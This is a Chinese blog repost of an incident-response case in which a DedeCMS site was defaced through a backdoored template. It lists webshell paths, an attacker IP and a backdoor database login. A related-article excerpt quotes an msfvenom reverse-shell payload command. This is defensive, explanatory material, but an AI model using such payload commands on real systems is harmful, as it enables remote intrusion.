Linux应急响应实战

最新推荐文章于 2025-10-14 11:17:14 发布
转载 最新推荐文章于 2025-10-14 11:17:14 发布 · 366 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://mp.weixin.qq.com/s/HCH_VOVCMeJ1l2l6Jb2-Fg

本文讲述了网站被挂博彩后,通过检查异常账户、网络连接和SSH配置,发现是模板后门导致。作者详细记录了木马文件定位、IP追踪,并给出了处置建议,包括清理木马、修改服务器密码和检查数据库安全。

接到个单子,网站被挂博彩

客户机器环境

服务器系统: CentOS 7

服务器管理面板: 宝塔

CMS: 织梦 CMS V57 SP2

过程

 

向客户了解情况后,登录了服务器进行检查,发现历史执行过的命令有些异常,系统账号被添加了 admin,用户组为admin,向客户确认后为客户所执行,账号非客户所添加

 图片

图片

网络检查

 

随后执行了 netstat -anutlp 对当前连接进行了检查,无异常,初步判定没有被留远控

图片

SSH 检查

对 SSH配置文件SSH应用程序进行了检查,

SSH 程序正常

图片

SSH配置文件发现被设置了 ssh key

图片

图片

文件检测 & 日志分析

文件检测

由于客户机器上运行着4个站点,所以down了相关网站文件和日志,网站文件使用D盾进行了扫描,发现其中2个织梦CMS站点都被传了Shell

图片

shell路径

/m.xxx.com/anli/list_2.php
/m.xxx.com/data/enums/bodytypes.php
/m.xxx.com/data/module/moduleurllist.php
/m.xxx.com/images/js/ui.core.php
/m.xxx.com/include/ckeditor/plugins/iframe/images/indax.php
/m.xxx.com/install/config.cache.inc.php
/m.xxx.com/member/ajax_loginsta.php
/m.xxx.com/plus/arcmulti.php
/m.xxx.com/plus/img/face/list_2_2.php
/m.xxx.com/templets/default/style/touchslide.1.1.php
/m.xxx.com/tuiguang/18.html.php
/www.xxx.com/anli/list_1.php
/www.xxx.com/images/lurd/button_save.php
/www.xxx.com/include/dialog/img/picviewnone.php
/www.xxx.com/include/inc/funstring.php
/www.xxx.com/jianzhan/list_3.php
/www.xxx.com/jinfuzi-seo/css/menuold.php
/www.xxx.com/plus/img/channellist.php
/www.xxx.com/templets/default/images/banner_03.php
/www.xxx.com/tuiguang/2018/1205/19.php

其中一个 shell

图片

 

日志分析

使用 Apache Log Viewer 对日志进行分析,设置了shell文件正则后如下图

图片

寻找第一次访问shell的IP

图片

最终发现

图片

IP:117.95.26.92 为首次使用网站后门上传其他 shell 的 IP

 

由于客户的站点是仿站,模板为网上下载,怀疑存在模板后门的情况,综合日志分析,确认为模板后门

处置与意见

1、网站中的木马文件已经删除,根据访问日志确认是模板后门造成的此次事件。

2、服务器异常账户已经删除,考虑到该异常账户多次成功登录到服务器,而且历史操作中有切换到root用户痕迹,怀疑服务器密码已经泄露,已建议客户修改。

3、数据库检查中发现http://www.xxx.com存在一个疑似后门的账户,用户名admin,密码 admin1.2.3

4、被篡改的首页已经恢复

图片

实战Linux应急响应踩坑与深度反思(上)
技术超强的网络安全平台
05-19 863
实战Linux应急响应踩坑与深度反思 写在前面 随着近几年安全行业的兴起,攻击者的攻击手法也大不相同,在不经意间自己的服务器就给别人攻击了,面对这些情况我们如何做出处理显得至关重要,在应急响应的过程中我们遇到的情况可能,有的时候可能踩坑,对每一次应急响应做出反思,那么在以后的工作中就可能少踩坑,效率也会提高,下面将介绍一次对自己服务器应急踩坑事件、进行深刻反思并扩展知识,请勿喷我的低级错误。 挖矿应急响应分析 突然手机收到一条短信,直接给我搞蒙了,我的服务器给日了?心里有点慌,马上登录服务器查看。 ...
Linux应急响应流程及实战演练
02-03
Linux应急响应流程及实战演练,有需要的可以仔细阅读,里面的流程很详细,很不错!
2025年网络安全应急响应45个实战技巧!
最新发布
2402_84205067的博客
10-14 966
2025年网络安全应急响应45个实战技巧摘要:面对日益复杂的网络威胁,本文系统梳理了45个应急响应核心技巧,涵盖预防准备、事件检测、快速阻断、深度分析和恢复加固五大阶段。关键措施包括:制定分级应急预案、建立威胁情报共享机制、遵循"3-2-1"备份原则;部署全流量监控和EDR终端防护;实施网络隔离三步走策略;开展攻击链溯源取证;以及系统重建与漏洞闭环管理。针对勒索病毒、DDoS等特殊场景提供专项解决方案,并强调法律合规要求。这些技巧可帮助企业构建全面的网络安全防御体系。
Linux 应急响应流程及实战演练.docx
06-10
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。 针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些 Linux 服务器入侵排查的思路。
应急响应实战笔记(续)
05-26 449
在上周,我发布了一个项目,我把它叫做应急响应实战笔记,收集和汇总了一些我经手处理的应急响应案例。 GitHub 地址:https://github.com/Bypass007/Emergency-Response-Notes 这个项目,也收到了不少童鞋的反馈,其中有一位让我印象深刻,第一次收到如此认真的反馈: 我马上写了一份邮件回复:感谢你这么详细的阅读并指正了几个问题...
应急响应实战
itboy_szjj的博客
05-26 1906
应急响应;网络安全
应急响应实战方案手册》
02-18
应急响应实战方案手册》旨在为网络安全工作者提供一套实战性的应急响应指南,尤其是对于红蓝队(攻防双方)在模拟网络攻击演练(攻防演练)中的实际应用。该手册覆盖了从系统入侵排查到事件处理的各个方面,包含...
Linux 应急响应手册v1.8 发行版.zip
07-24
Linux应急手册》是一本为Linux系统管理员和运维工程师量身打造的...本书内容涵盖了Linux系统安全、性能优化、故障排查等多个方面,通过丰富的实战案例和详细的操作步骤,帮助读者掌握Linux应急响应的核心技能和知识。
精选资源
应急响应工具集及应急响应实战笔记.zip
08-04
网络安全应急响应工具集及应急响应实战笔记 辅助工具集 进程分析工具集 练手样本集 流量分析工具集 启动项分析工具集 信息收集工具集 专杀工具集 Webshell查杀集 第01章:入侵排查篇 第02章:日志分析篇 第03章:...
精选资源
应急响应实战笔记+linux、windows加固手册(建议收藏@@@)
08-07
应急响应实战笔记+linux、windows加固手册,详细讲述了linux、windows加固方法和应急响应流程,值得收藏
一套完整的应急响应实战
qq_22893055的博客
07-22 1798
DDOS侧重于使目标服务不可用,DNS劫持和ARP欺骗则侧重于控制通信过程。DDOS从流量层面影响服务,DNS劫持和ARP欺骗从协议层面影响通信。检测DDOS需要关注服务器资源使用,而DNS劫持和ARP欺骗需要检查网络协议状态。以上是对各种攻击的判断,当然,在很多应急情况下,可由一些人负责事件的判断,再分出一部分人做一些常规检查。Windows系统日志是记录系统中硬件、软件和系统问题的信息,同时还可以监视系统中发生的事件。用户可以通过它来检查错误发生的原因,或者寻找受到攻击时攻击者留下的痕迹。
应急响应实战笔记_2020最新版.pdf
06-24
整体目录结构共六章,分为技巧篇和实战篇。第1~3章为技巧篇,分别对应入侵排查、日志分析和权限维持,第4~6章为实战篇,包含了Windows/Linux各种病毒木马,web入侵事件溯源处理过程。
Day3-1 应急响应实战(一)
m0_75031198的博客
04-24 1510
制定应急预案,组建包含领导小组、技术保障小组的应急团队,明确职责分工;:整理排查过程中的发现,包括脱库语句、攻击者 IP、数据泄露情况、后台登录时间、webshell 情况等,总结应对措施。:整理排查过程中的发现,包括 webshell 类型、攻击者 IP、漏洞来源、首页被篡改时间等,总结应对措施。:整理排查过程中的发现,包括攻击者 IP、成功连接时间、脱库时间和内容、后续攻击行为等,总结应对措施。:整理排查过程中的发现,包括木马文件、攻击者 IP、漏洞类型等,总结入侵的可能途径和应对措施。
实战Linux应急响应踩坑与深度反思(下)
技术超强的网络安全平台
05-21 679
隐藏进程应急响应 首先状况是出现了系统卡顿,不知道怎么回事,查看了自己的CPU并未发现异常 查看是否有异常进程并未发现有异常进程,思考的问题来了为什么会有外网连接的ip 查看任务并未发现定时任务 在/etc下面的目录查找最近12小时被修改的文件,在这里第一开始的时候是在~目录下查找,由于文件太多不易分辨,所以就依次在一些常用的系统目录进行查找 /etc/ld.so.preload 文件的变更需要引起注意,这里涉及到 Linux 动态链接库预加载机制,是一种常用的进程隐藏方法,而 top 等命令都是受
应急响应实战之木马实战
qq_52074678的博客
05-09 2313
一.应急响应流程回顾 二.木马攻击模拟实验 (特别注意本次实验仅仅用于模拟木马攻击实验,不能拿去搞破坏,家有家规,国有国法,希望大家知法守法.) 1.环境介绍 攻击机 kali: 下载地址 被攻击机(注意关闭防火墙) win10: 下载地址: 木马脚本源码 msfvenom -a -x86 --platfrom windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口号 -b "\x00" -e x86/sh
Linux 常见紧急情况处理方法
weixin_34144848的博客
09-30 185
使用急救盘组进行维护   急救盘组(也称为 boot/root 盘组),是系统管理员必不可少的工具。用它可以独立地启动和运行一个完整的 Linux 系统。实际上,急救盘组中的第 2 张盘上就有一个完整的 Linux 系统,包括 root 文件系统;而第 1 张盘则存放了可启动的内核。  使用急救盘组维护系统很简单。只需用这两张盘启动系统后,进入急救模式,这时使用的是 root 账户。为了能访问...
应急响应实战笔记——Linux实战篇:④ 盖茨木马
君逍遥o
04-10 1015
Linux盖茨木马是一类有着丰富历史,隐藏手法巧妙,网络攻击行为显著的DDoS木马,主要恶意特点是具备了后门程序,DDoS攻击的能力,并且会替换常用的系统文件进行伪装。木马得名于其在变量函数的命名中,大量使用Gates这个单词。分析和清除盖茨木马的过程,可以发现有很多值得去学习和借鉴的地方。
应急响应实战分析
m0_74965862的博客
05-08 882
网络安全应急响应是针对网络安全事件所建立的系统性应对机制,其核心是通过预防、检测、处置和恢复等全流程措施,最大限度降低安全事件的影响。应急响应是组织机构为应对网络攻击、数据泄露等安全事件,通过技术和管理手段快速响应并恢复业务的过程,包含事前预防、事中处置和事后改进三个阶段。根据国家标准,其目标包括预防潜在风险、遏制事件扩散、修复系统漏洞及提升防御能力。制定应急预案,组建包含领导小组、技术保障小组的应急团队,明确职责分工;部署流量分析、漏洞检测等工具,定期开展攻防演练和人员培训。
应急响应实战指北
Ms08067安全实验室
12-06 321
应急响应”对应的英文是Incident Response或Emergency Response,通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施。其目的是降低突发事件造成的损失,包括人民生命、财产,国家企业的经济损失。网络安全领域的应急响应(Cyber Security Emergency Response System)是指在突发重大网络安全事件后对包括计算机运...
linux应急响应流程实战
03-16
### Linux环境下应急响应流程 在Linux环境中,应急响应是一个系统化的过程,旨在快速识别、遏制和修复潜在的安全威胁或故障。以下是针对Linux环境下的应急响应流程及相关技术要点: #### 一、准备阶段 此阶段的目标是建立完善的应急响应机制,确保团队能够迅速应对突发情况。 - **组织架构设计** 基于引用中的描述[^2],应急响应的组织架构应当清晰定义各小组的角色与职责。例如,技术保障组负责制定具体的技术支持方案,而日常运行组则需定期更新系统的配置文件和备份数据。 - **工具与资源配置** 准备必要的工具集,包括但不限于日志分析器、网络流量监控软件以及脚本自动化工具。 #### 二、检测与分析阶段 当发现异常行为时,立即启动检测程序以确认是否存在真正的安全事件。 - **日志审查** 对服务器上的各类日志进行全面检查,特别是`/var/log/auth.log`(记录登录尝试)、`/var/log/syslog`(综合系统活动)等重要位置[^1]。通过这些日志可以追踪到可疑用户的操作痕迹及其访问模式。 - **进程排查** 使用命令如 `ps aux`, `top`, 或者更高级别的工具如 `htop` 来查找任何不寻常或者未知的服务正在运行。此外还可以借助专门用于恶意软件扫描的应用来辅助判断是否有隐藏进程存在[^3]。 ```bash # 查看所有正在运行的进程 ps aux | grep suspicious_process_name ``` #### 三、遏制措施 一旦验证确实发生了安全事故,则需要采取行动阻止进一步扩散。 - **隔离受影响主机** 将受感染机器从生产网络断开连接,防止攻击者利用该节点作为跳板继续渗透其他设备。 - **调整防火墙规则** 修改现有的防火墙设置,封锁已知被滥用端口和服务入口。例如关闭不必要的SSH远程管理接口除非绝对必要才开启特定IP白名单访问权限。 ```bash # 添加一条新的iptables规则拒绝外部ssh请求 sudo iptables -A INPUT -p tcp --dport 22 -j DROP ``` #### 四、根除与恢复阶段 彻底清除残留威胁并恢复正常业务运作。 - **清理恶意组件** 删除由黑客植入的所有非法文件夹及注册表项等内容,并重新安装可能已被篡改的核心应用程序版本。 - **强化防护体系** 定期打补丁升级操作系统内核以及其他第三方库依赖包至最新稳定版号;启用SELinux强制执行策略加强本地权限管控力度。 #### 五、事后总结报告撰写 完成整个处置过程之后编写详尽的事发经过说明文档供未来参考学习之用。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值